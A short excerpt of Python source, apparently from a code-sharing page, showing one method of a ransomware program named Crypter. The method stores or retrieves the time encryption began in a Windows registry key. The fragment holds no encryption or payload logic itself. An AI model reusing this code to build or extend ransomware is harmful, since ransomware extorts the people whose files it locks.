Main.py 文件源码

def get_start_time(self):
    '''
    @summary: Get's Crypter's start time from the registry, or creates it if it
    doesn't exist
    @return: The time that the ransomware began it's encryption operation, in integer epoch form 
    '''

    # Try to open registry key
    try:
      reg = _winreg.OpenKeyEx(_winreg.HKEY_CURRENT_USER, self.REGISTRY_LOCATION)
      start_time = _winreg.QueryValueEx(reg, "")[0]
      _winreg.CloseKey(reg)
    # If failure, create the key
    except WindowsError:
      start_time = int(time.time())
      reg = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, self.REGISTRY_LOCATION)
      _winreg.SetValue(reg, "", _winreg.REG_SZ, str(start_time))
      _winreg.CloseKey(reg)

    return start_time